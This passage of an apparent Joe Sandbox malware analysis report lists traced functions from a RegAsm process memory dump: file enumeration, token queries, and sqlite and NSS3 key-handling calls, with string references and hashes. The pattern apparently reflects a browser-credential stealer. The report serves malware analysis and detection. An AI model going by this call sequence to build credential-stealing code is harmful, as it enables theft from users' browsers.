                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415F8E
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00415FA6
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00415FBD
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004268EC), ref: 00415FDA
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004268F0), ref: 00415FF4
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00416018
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: _EH_prolog.MSVCRT ref: 00412DC2
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: memset.MSVCRT ref: 00412DE3
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: memset.MSVCRT ref: 00412DF1
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: lstrcat.KERNEL32(?,00000000), ref: 00412E1D
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: lstrcat.KERNEL32(?), ref: 00412E3B
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: lstrcat.KERNEL32(?,?), ref: 00412E4F
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: lstrcat.KERNEL32(?), ref: 00412E62
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: StrStrA.SHLWAPI(00000000), ref: 00412EFC
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00416147
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00416156
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041617B
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 0041618E
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00416197
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 004161A4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prolog$lstrcpy$Findlstrlen$FileHeapmemsetwsprintf$AllocCloseFirstNextProcessSystemTime
                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                                  • API String ID: 398052587-2848263008
                                                                                                                                                                                                                                                                  • Opcode ID: 7a98332b4077d446cd62e0c1e3c4a94eae42174cdc75846332ee3e5d05188201
                                                                                                                                                                                                                                                                  • Instruction ID: 5b2bfe7850d0d26085d3f59bcdd678c2daf311e468f9b5f5882da7259ac5939b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a98332b4077d446cd62e0c1e3c4a94eae42174cdc75846332ee3e5d05188201
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16817E71D00259AFDF10EBE4DC49BEEBB78AF15304F10406AF515B3191EB785688CB65
                                                                                                                                                                                                                                                                  Function 6C901C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C901C6B
                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C901C75
                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C901CA1
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 6C901CA9
                                                                                                                                                                                                                                                                  • malloc.MOZGLUE(00000000), ref: 6C901CB4
                                                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C901CCC
                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C901CE4
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 6C901CEC
                                                                                                                                                                                                                                                                  • malloc.MOZGLUE(00000000), ref: 6C901CFD
                                                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C901D0F
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 6C901D17
                                                                                                                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32 ref: 6C901D4D
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 6C901D73
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C901D7F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C901D7A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                                                                                                                                                  • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                                                                                                                                                  • API String ID: 3748115541-1216436346
                                                                                                                                                                                                                                                                  • Opcode ID: d181c7fcc3d1a91c3ee1a7e2624de50262917d90d69e2d68a94831d5f069fefd
                                                                                                                                                                                                                                                                  • Instruction ID: a6e1dfe22f1772bf1f20cc3b957f7ed2e76a8a1f5ced29c3e6369b77a0e38adf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d181c7fcc3d1a91c3ee1a7e2624de50262917d90d69e2d68a94831d5f069fefd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE315EB5A00319AFEF14AF65CC48AAA7BB9FF5A348F008169F60992111E7309985CF65
                                                                                                                                                                                                                                                                  Function 6C8B1C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8B1D58
                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8B1EFD
                                                                                                                                                                                                                                                                  • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C8B1FB7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • abort due to ROLLBACK, xrefs: 6C8B2223
                                                                                                                                                                                                                                                                  • unknown error, xrefs: 6C8B2291
                                                                                                                                                                                                                                                                  • sqlite_master, xrefs: 6C8B1C61
                                                                                                                                                                                                                                                                  • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C8B1F83
                                                                                                                                                                                                                                                                  • sqlite_temp_master, xrefs: 6C8B1C5C
                                                                                                                                                                                                                                                                  • table, xrefs: 6C8B1C8B
                                                                                                                                                                                                                                                                  • unsupported file format, xrefs: 6C8B2188
                                                                                                                                                                                                                                                                  • no more rows available, xrefs: 6C8B2264
                                                                                                                                                                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 6C8B20CA
                                                                                                                                                                                                                                                                  • another row available, xrefs: 6C8B2287
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                                                                                  • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                                                                                  • API String ID: 563213449-2102270813
                                                                                                                                                                                                                                                                  • Opcode ID: 10746037dac0ed6e3241e6e86b60d0ec7ce23f56d882b55069e116957ea54da2
                                                                                                                                                                                                                                                                  • Instruction ID: 7155ec3791afada30f8eca535b385fba011e17a1e35ea98ac34bca429edb54c7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10746037dac0ed6e3241e6e86b60d0ec7ce23f56d882b55069e116957ea54da2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2912CF706087018FD725CF19C184A5AB7F2BF85318F188D6DE899ABB12D735EC46CB82
                                                                                                                                                                                                                                                                  Function 6C93FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6C93FD06
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6C93F696
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6C93F789
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6C93F796
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6C93F79F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F670: SECITEM_DupItem_Util.NSS3 ref: 6C93F7F0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C963440: PK11_GetAllTokens.NSS3 ref: 6C963481
                                                                                                                                                                                                                                                                    • Part of subcall function 6C963440: PR_SetError.NSS3(00000000,00000000), ref: 6C9634A3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C963440: TlsGetValue.KERNEL32 ref: 6C96352E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C963440: EnterCriticalSection.KERNEL32(?), ref: 6C963542
                                                                                                                                                                                                                                                                    • Part of subcall function 6C963440: PR_Unlock.NSS3(?), ref: 6C96355B
                                                                                                                                                                                                                                                                  • SECITEM_DupItem_Util.NSS3(?), ref: 6C93FDAD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C919003,?), ref: 6C96FD91
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FD80: PORT_Alloc_Util.NSS3(A4686C97,?), ref: 6C96FDA2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C97,?,?), ref: 6C96FDC4
                                                                                                                                                                                                                                                                  • SECITEM_DupItem_Util.NSS3(?), ref: 6C93FE00
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FD80: free.MOZGLUE(00000000,?,?), ref: 6C96FDD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C95E5A0
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C93FEBB
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C93FEC8
                                                                                                                                                                                                                                                                  • PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6C93FED3
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C93FF0C
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C93FF23
                                                                                                                                                                                                                                                                  • PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6C93FF4D
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C93FFDA
                                                                                                                                                                                                                                                                  • PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6C940007
                                                                                                                                                                                                                                                                  • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C940029
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C940044
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 138705723-0
                                                                                                                                                                                                                                                                  • Opcode ID: d1d3e2bb62ab540989365a79c87243dd595e51bbe2cd51554e78073b70592175
                                                                                                                                                                                                                                                                  • Instruction ID: 147a0807f24e0f9c954a0ad6d4d59a89e1e0a978256a192d2c0b7aa35bdda547
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1d3e2bb62ab540989365a79c87243dd595e51bbe2cd51554e78073b70592175
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8B1D1B1604211AFE314CF29CC40A6AB7E5FF9830CF548A6DF99D97A81E730E954CB91
                                                                                                                                                                                                                                                                  Function 0040A9D4 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 431filestringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040A9D9
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0040AA02
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040AA19
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425EE4), ref: 0040AA36
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425EE8), ref: 0040AA50
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00425C2A,00000000,?,?,?,00425EEC,?,?,00425C27), ref: 0040AB00
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040AF97
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040AFA6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitwsprintf
                                                                                                                                                                                                                                                                  • String ID: #$%s\*.*
                                                                                                                                                                                                                                                                  • API String ID: 1095930517-2760317471
                                                                                                                                                                                                                                                                  • Opcode ID: 296e209a0fa391053453af33cbaa6bc495bfdb0432aa7fa96c6bbdde4ce6bcd7
                                                                                                                                                                                                                                                                  • Instruction ID: 5591a32c6147e38e69519f51dc30b330cf61ad29ea70fe83c02adb92ca8483ef
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 296e209a0fa391053453af33cbaa6bc495bfdb0432aa7fa96c6bbdde4ce6bcd7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61025D7190024CEADF15EBA5C846BDEBB78AF15318F1440BAE509B35C2DB781B4CCB66
                                                                                                                                                                                                                                                                  Function 6C961CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C961F19
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C962166
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C96228F
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C9623B8
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C96241C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$Error
                                                                                                                                                                                                                                                                  • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                                                                                  • API String ID: 3204416626-1906384322
                                                                                                                                                                                                                                                                  • Opcode ID: cd50dec81c190a856c9d93220a7cf2373dbdd8dc5cbe49d63a3e653837b66868
                                                                                                                                                                                                                                                                  • Instruction ID: a2177a9126409aca3e411c8657914e3e92bf62f339a7434885a7fa9f86391e9b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd50dec81c190a856c9d93220a7cf2373dbdd8dc5cbe49d63a3e653837b66868
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84022E72D0CBC86EF7358272C54D7D76AA89B46328F0D166EC5DE46EC3C3B899888351
                                                                                                                                                                                                                                                                  Function 6C966C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C911C6F,00000000,00000004,?,?), ref: 6C966C3F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C911C6F,00000000,00000004,?,?), ref: 6C966C60
